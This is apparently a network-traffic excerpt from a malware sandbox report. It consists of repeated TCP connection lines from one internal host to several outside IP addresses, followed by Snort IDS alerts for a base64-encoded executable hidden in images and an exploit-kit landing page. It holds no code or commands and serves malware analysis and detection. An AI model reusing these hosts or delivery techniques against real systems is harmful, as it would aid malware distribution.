Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 172.67.148.197:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.148.197:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 172.67.148.197:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 172.67.148.197:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.92.254.14:80
Source: global traffic	TCP traffic: 91.92.254.14:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.92.254.14:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.92.254.14:80
Source: global traffic	TCP traffic: 91.92.254.14:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 91.92.254.14:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.92.254.14:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.92.254.14:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.92.254.14:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.92.254.14:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 172.232.56.138:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 172.232.56.138:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.92.254.194:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.92.254.194:80

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.14:80 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 91.92.254.194:80 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 91.92.254.194:80 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.194:80 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 172.232.56.138:80 -> 192.168.2.22:49176
